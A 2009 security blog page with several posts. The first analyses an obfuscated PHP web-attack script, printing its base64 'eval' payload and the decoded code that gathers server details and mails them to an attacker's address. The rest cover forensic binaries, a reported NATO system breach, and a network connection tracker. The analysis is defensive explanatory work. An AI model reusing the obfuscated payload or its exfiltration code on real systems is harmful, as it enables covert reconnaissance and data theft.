06.23.09

Obfuscating php code with base64

Posted in Information, OpenSourceSoftware, Security at 1:13 pm by Edward Bjarte Fjellskål

I keep seeing obfuscated php code in web application attacks, but its rather simple…

$lmge =
"JGNyZWF0b3I9YmFzZTY0X2RlY29kZSgiWm5Jek0zTm9NMnhzUUdkdFlXbHNMbU52YlE9PSIpOw0KKCRzYWZlX21vZ
GUpPygkc2FmZXo9Ik9OIik6KCRzYWZlej0iT0ZGX0hFSEUiKTsNCiRiYXNlPSJodHRwOi8vIi4kX1NFUlZFUlsnSFRUUF9I
T1NUJ10uJF9TRVJWRVJbJ1JFUVVFU1RfVVJJJ107IA0KJG5hbWUgPSBwaHBfdW5hbWUoKTsgJGlwID0gZ2V0ZW52K
CJSRU1PVEVfQUREUiIpOyAkaXAyID0gZ2V0aG9zdGJ5YWRkcigkX1NFUlZFUltSRU1PVEVfQUREUl0pOyAkc3ViaiA9I
CRfU0VSVkVSWydIVFRQX0hPU1QnXTsgDQokbXNnID0gIlxuQkFTRTogJGJhc2VcbnVuYW1lIGE6ICRuYW1lXG5CeXB
hc3M6ICRieXBhc3NlclxuSVA6ICRpcFxuSG9zdDogJGlwMiAkcHdkcyI7DQokZnJvbSA9IkZyb206ICIuJHdyaXQuIl9fXz0iL
iRzYWZlei4iPHRvb2xAIi4kX1NFUlZFUlsnSFRUUF9IT1NUJ10uIj4iOw0KbWFpbCggJGNyZWF0b3IsICRzdWJqLCAkbXNn
LCAkZnJvbSk7"; eval(base64_decode($lmge));

So, when you base64_decode it (just switch eval with echo), you get:

$creator=base64_decode("ZnIzM3NoM2xsQGdtYWlsLmNvbQ==");
($safe_mode)?($safez="ON"):($safez="OFF_HEHE");
$base="http://".$_SERVER['HTTP_HOST'].$_SERVER['REQUEST_URI'];
$name = php_uname(); $ip = getenv("REMOTE_ADDR"); $ip2 = gethostbyaddr($_SERVER[REMOTE_ADDR]); $subj = $_SERVER['HTTP_HOST'];
$msg = "\nBASE: $base\nuname a: $name\nBypass: $bypasser\nIP: $ip\nHost: $ip2 $pwds";
$from ="From: ".$writ."___=".$safez."<tool@".$_SERVER['HTTP_HOST'].">";
mail( $creator, $subj, $msg, $from);

Again, hiding the email address in base64:
$creator=base64_decode("ZnIzM3NoM2xsQGdtYWlsLmNvbQ==");
Which spells out fr33sh3ll@gmail.com

There is also an “error” in the script, $bypasser is never set, but used in $msg.

Output sent to the fr33sh3ll account looks like this:

From: ___=OFF_HEHE<tool@gamelinux.org>
Subject: gamelinux.org
Data:
BASE: http://gamelinux.org/vurnable.php
uname a: Linux gamelinux 2.6.30 #1 SMP Wed Apr 1 23:47:10 UTC 2009 x86_64
Bypass:
IP: 10.10.3.254
Host: cracker.crackers.ru

From googling, it seems that the email account is old, and gmail has probably shut it down… so the bot that fires this around is probably old…

06.19.09

Binaries for Incident Response/Forensic analysis

Posted in Information, OpenSourceSoftware, Linux Distributions, Security, forensics at 1:03 pm by Edward Bjarte Fjellskål

I did a forensics job in December 08, running upon the problem that my static compiled binaries did not work on my target system. I made static bins that I needed for the job, but it took some time, so I noted a better way to do it from a sans blogpost. I made a quick and dirty script to prepare my forensic media, and have used it like that since.

A fellow GCFA posted his version yesterday of a script, and I merged it with mine and I plan to make more .iso’s and you will find them under: http://download.gamelinux.org/InsidentResponse/

The iso’s has the format:
Forensics-dynamic-bins-<Distro>-<Version>-<Arch>.iso

06.17.09

NORSYS, NATO’s secret computer system hacked.

Posted in Information, OpenSourceSoftware, Security at 9:00 am by Edward Bjarte Fjellskål

Im posting this, as I read it as a small note in the paper version of VG on Monday 15. of June 2009 and that I cant find any digital reference to it, nor to NORSYS on the Internet.

Tom Bakkeli is the author of the article in the newspaper version. He has very deep knowledge about the Norwegian military and its secrecy.

Forsvarets sikkerhetstjeneste (FOST) alleged prevented a catastrophe, as an alleged foreign government hacker had entered NORSYS, NATO’s secret computer system.

Defense minister Anne-Grete Strøm-Erichsen confirms that in one occasion, FOST prevented serious damages to NORSYS. Under a NATO-exercise three years ago, FOST discovered that someone had successfully entered NORSYS.

Anne-Grete Strøm-Erichsen does not want to comment on when and where, nor who was behind the breach.

Readers comment (Unconfirmed):
NORSYS is not equal to “NATO’s secret Network”.

06.08.09

CxTracker - A passive network connection tracker…

Posted in Information, OpenSourceSoftware, Security, Sguil, cxtracker at 7:12 pm by Edward Bjarte Fjellskål

I just tested my latest perl project, cxtracker, with sguil.

CxTracker (Connection Tracker) is a passive network connection tracker for profiling, history, auditing and network discovery. It can be used as an replacement for sancp in the sguil setup.

I started implementing this because I am thinking of making prads a bit more connection oriented. In stead of branching prads, I started a small perl script, and I quickly saw that it could do well as a standalone daemon in my sguil environment. So it now has its own life.

I will polish a bit more on it, and then start porting the functionality into prads for some performance testing. The idea, is that making prads aware of connections, one can do regexp on parts of the traffic, and not the whole traffic (to save cpu cycles on tcp/udp service/client detection).

Check it out/Clone it! Feedback is always wellcome!

“Know your connections!”